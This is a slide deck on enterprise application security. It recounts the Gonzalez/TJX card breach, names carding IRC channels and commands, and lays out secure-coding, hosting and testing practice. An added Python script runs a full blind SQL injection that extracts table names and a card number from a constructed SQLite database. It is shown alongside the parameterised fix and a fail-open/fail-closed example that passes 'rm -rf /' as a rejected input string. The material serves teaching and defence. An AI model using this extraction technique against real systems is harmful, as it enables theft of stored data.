Application Security – Enterprise Strategies
K. K. Mookhey, CISA, CISSP, CISM – Principal Consultant
www.niiconsulting.com
Agenda
• The Biggest Hack in History
• How the Cookie Crumbles
• Answers!
Speaker Introduction
• Founder & Principal Consultant, Network Intelligence
• Speaker at Blackhat 2004, Interop 2005, IT Underground 2005, OWASP Asia 2008 and 2009
• Co-author of books on the Metasploit Framework (Syngress) and Linux Security & Controls (ISACA)
• Author of numerous articles on SecurityFocus, IT Audit and IS Controls (ISACA)
• Conducted numerous pen-tests, application security assessments, forensic investigations, etc.
THE BIGGEST HACK IN HISTORY
Gonzalez, TJX and Heart-break-land
• More than 200 million credit card numbers stolen
• Heartland Payment Systems, TJX and two US national retailers hacked
• Modus operandi
  – Visit retail stores to understand how they work
  – Analyse the companies' websites for vulnerabilities
  – Break in using SQL injection
  – Inject malware onto internal systems
  – Sniff the network for card numbers and details
  – Hide tracks
The hacker underground
• Albert Gonzalez
  – a/k/a "segvec"
  – a/k/a "soupnazi"
  – a/k/a "j4guar17"
• Malware, scripts and hacked data hosted on servers in:
  – Latvia
  – Netherlands
  – Ukraine
  – New Jersey
  – California
• IRC chats
  – March 2007: Gonzalez "planning my second phase against Hannaford"
  – December 2007: Hacker P.T. "that's how [HACKER 2] hacked Hannaford."
Where does all this end up?
• IRC channels
  – #cc, #ccards, #ccinfo, #ccpower, #ccs, #masterccs, #thacc, #thecc, #virgincc
• Commands used on IRC
  – !cardable
  – !cc, !cclimit, !chk, !cvv2, !exploit, !order.log, !proxychk
TJX direct costs
• $24 million to Mastercard
• $41 million to Visa
• $200 million in fines/penalties
Cost of an incident
• $6.6 million average cost of a data breach
• Of this, lost business accounts for $4.6 million
• More than $200 per compromised record
On the other hand:
• Fixing a bug costs $400 to $4,000
• The cost of a fix rises sharply the later in the lifecycle the bug is found
How the Cookie Crumbles
Betting blind!
• DB name
• Table names
• User IDs
• Table structure
• Data
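The "betting blind" list above is exactly the sequence a blind SQL injection walks through. As an added example (not from the original deck and not Gonzalez's tooling), the following Python script runs that enumeration against a constructed in-memory SQLite database: the application concatenates a product ID into its query, the attacker turns the presence or absence of a product row into a yes/no oracle and recovers the engine version, the table names, one table's DDL and a card number a character at a time, and the parameterised version of the same query closes the hole. The tables, column names and card number are made up; SQLite's `sqlite_master` catalogue stands in for `information_schema` on MySQL or `sysobjects` on MSSQL.

```python
import sqlite3

# Added example (not from the original deck): boolean-based blind SQL
# injection against a constructed in-memory SQLite store, followed by the
# parameterised query that removes the injection. All data is made up.


def build_db():
    """Constructed sample database standing in for a retailer's back end."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE cards (id INTEGER PRIMARY KEY, pan TEXT);
        INSERT INTO products VALUES (1, 'widget'), (2, 'gadget');
        INSERT INTO cards VALUES (1, '4111111111111111');
    """)
    return conn


def vulnerable_lookup(conn, product_id):
    """The bug: user input is concatenated straight into the SQL text."""
    sql = "SELECT name FROM products WHERE id = " + product_id
    return conn.execute(sql).fetchall()


def safe_lookup(conn, product_id):
    """The fix: a bound parameter; the input can never change the query's shape."""
    sql = "SELECT name FROM products WHERE id = ?"
    return conn.execute(sql, (product_id,)).fetchall()


def oracle(conn, condition):
    """One yes/no question. The page 'answers' by returning a product row or
    not, so the attacker needs neither error messages nor visible query output."""
    payload = f"1 AND ({condition})"
    return len(vulnerable_lookup(conn, payload)) > 0


def extract_string(conn, subquery, max_len=40):
    """Recover the scalar result of `subquery` one character at a time.
    Each character costs about eight oracle calls (binary search over ASCII)."""
    result = ""
    for pos in range(1, max_len + 1):
        if not oracle(conn, f"length(({subquery})) >= {pos}"):
            break  # past the end of the string, or the subquery returned NULL
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


def db_version(conn):
    """'DB name' step of the slide: fingerprint the engine."""
    return extract_string(conn, "SELECT sqlite_version()")


def enumerate_tables(conn, limit=20):
    """'Table names' step: walk the catalogue one row at a time."""
    tables = []
    for offset in range(limit):
        name = extract_string(
            conn,
            "SELECT name FROM sqlite_master WHERE type = 'table' "
            f"ORDER BY name LIMIT 1 OFFSET {offset}",
        )
        if not name:
            break
        tables.append(name)
    return tables


def table_ddl(conn, table):
    """'Table structure' step: pull the CREATE statement from the catalogue."""
    return extract_string(
        conn, f"SELECT sql FROM sqlite_master WHERE name = '{table}'", max_len=80
    )


def first_card(conn):
    """'Data' step: the first card number in the table just discovered."""
    return extract_string(conn, "SELECT pan FROM cards LIMIT 1")


if __name__ == "__main__":
    conn = build_db()
    print("engine :", db_version(conn))
    print("tables :", enumerate_tables(conn))
    print("ddl    :", table_ddl(conn, "cards"))
    print("data   :", first_card(conn))
    # The same payload against the parameterised query is just a string that
    # matches no row.
    print("safe   :", safe_lookup(conn, "1 AND (1=1)"))
```

Recovering one 16-digit card number takes roughly 130 requests that differ only in a numeric comparison inside the `id` parameter; that burst of near-identical requests is the signature a web application firewall or an application-aware SIEM should be tuned to catch, and the parameterised query is what makes the whole exercise pointless.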
Net Result
Enterprise owned!
Other aspects
App2App Communication
• App2App interaction requires an authentication process
  – The calling application needs to send credentials to the target application
• Common use cases
  – Applications and scripts connecting to databases
  – 3rd-party products accessing network resources
  – Job scheduling
  – Application server connection pools
  – Distributed computing centres
  – Application encryption key management
  – ATMs, kiosks, etc.
Answers!
Technology Solutions
• Web Application Firewalls
• Privileged Identity Management Suites
• Application-Aware Firewalls
• Application-Aware SIEMs
• Database Access Management Solutions
Before we get to the technology…
Application Security – Holistic Solution
(Cycle: Design → Develop/Manage → Test → Train)
Secure Design
• Secure design models
• Client inputs
• Client education
• Threat modeling
  – Threat classification – STRIDE (Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, Elevation of privilege)
  – Risk rating – DREAD (Damage, Reproducibility, Exploitability, Affected users, Discoverability)
Microsoft's Threat Modeling Tool
Secure Coding Overview
Secure coding isn't taught in school
• Build Security In (US DHS) and the Building Security In Maturity Model (BSIMM)
• Microsoft's Security Development Lifecycle (SDL)
• OpenSAMM (Software Assurance Maturity Model)
• OWASP Secure Coding Guides
Secure Coding Principles
1. Minimize attack surface area
2. Establish secure defaults
3. Principle of least privilege
4. Principle of defense in depth
5. Fail securely
6. Don't trust input – user or services
7. Separation of duties
8. Avoid security by obscurity
9. Keep security simple
10. Fix security issues correctly
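Principles 2, 3, 5 and 6 tend to fail together, and they fail in the error path rather than the happy path. As an added example (not from the original deck), the following Python snippet writes the same authorisation check twice: the first version drifts towards "allow" whenever the policy store is down, the action is unrecognised or the user is unknown; the second validates the action against an allowlist, treats an unavailable policy as a denial and gives unknown users an empty permission set. The policy table, permission names and `PolicyUnavailable` exception are constructed for the example.

```python
# Added example (not from the original deck): one authorisation check written
# twice. Both use the same constructed policy; they differ only in what
# happens when something goes wrong.

# Allowlist of actions the application knows about (constructed).
PERMISSIONS = {"report:read", "report:write", "user:admin"}

# Constructed policy: user -> granted permissions. Nobody holds more than
# they need (least privilege); anyone not listed holds nothing (secure default).
POLICY = {
    "alice": {"report:read", "report:write"},
    "bob": {"report:read"},
}


class PolicyUnavailable(Exception):
    """Raised when the policy store (database, directory, ...) cannot be reached."""


def load_policy(available=True):
    """Stand-in for a call to the policy backend; `available=False` simulates an outage."""
    if not available:
        raise PolicyUnavailable("policy backend down")
    return POLICY


def authorize_fail_open(user, action, loader=load_policy):
    """How this is often written: every unexpected case resolves to 'allow'."""
    try:
        policy = loader()
    except PolicyUnavailable:
        return True  # outage => 'keep the site working' => everyone is admin
    if action not in PERMISSIONS:
        return True  # unrecognised action is assumed harmless
    # Unknown user falls back to the full permission set: default permit.
    return action in policy.get(user, PERMISSIONS)


def authorize_fail_closed(user, action, loader=load_policy):
    """Fail securely, secure defaults, don't trust input."""
    if action not in PERMISSIONS:
        return False  # reject anything outside the allowlist before doing work
    try:
        policy = loader()
    except PolicyUnavailable:
        return False  # no policy => no access (and this is the event to alert on)
    # Unknown user gets an empty set: default deny.
    return action in policy.get(user, set())


if __name__ == "__main__":
    outage = lambda: load_policy(available=False)
    for check in (authorize_fail_open, authorize_fail_closed):
        print(check.__name__)
        print("  alice report:write       ->", check("alice", "report:write"))
        print("  bob report:write         ->", check("bob", "report:write"))
        print("  mallory user:admin       ->", check("mallory", "user:admin"))
        print("  alice 'rm -rf /'         ->", check("alice", "rm -rf /"))
        print("  alice report:read, down  ->", check("alice", "report:read", loader=outage))
```

The two functions agree on every case the developer tested (alice can write, bob cannot); they disagree only on the cases nobody tested, which is precisely where an attacker, or an outage, will find the difference.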
Vendor Management
• Big names != good security
• Contractual weaknesses
• Lack of vendor oversight
• No penalties for blatantly buggy code!
Secure Hosting
• Web security
  – Secured web server
  – Secured application server – all components
  – Web application firewalls
• OS security
  – Security patches
  – Users and groups
  – Access control
  – Security policies
  – Secured login
  – Logging
• Database security
  – Security patches
  – Users and roles
  – Access control
  – Logging
  – Password security
  – Database table encryption
  – Data masking
  – Secured login
Secure Testing
• Security testing options
  – Black box
  – Grey box
  – White box
  – Source code review
• OWASP Top Ten (www.owasp.org)
• OWASP Testing Guide
• Tools of the trade
  – Open source: Wikto, Paros, WebScarab, Firefox plugins
  – Commercial: Acunetix, Cenzic, Netsparker, Burp Suite
Training
• Back to basics
• Natural thought process
• Look at the larger picture
• Make it fun
• Give back to the community
Application Security Vision
(Cycle: Design → Develop/Manage → Test → Train)
Thank you! Questions?
Information Security Consulting Services
Institute of Information Security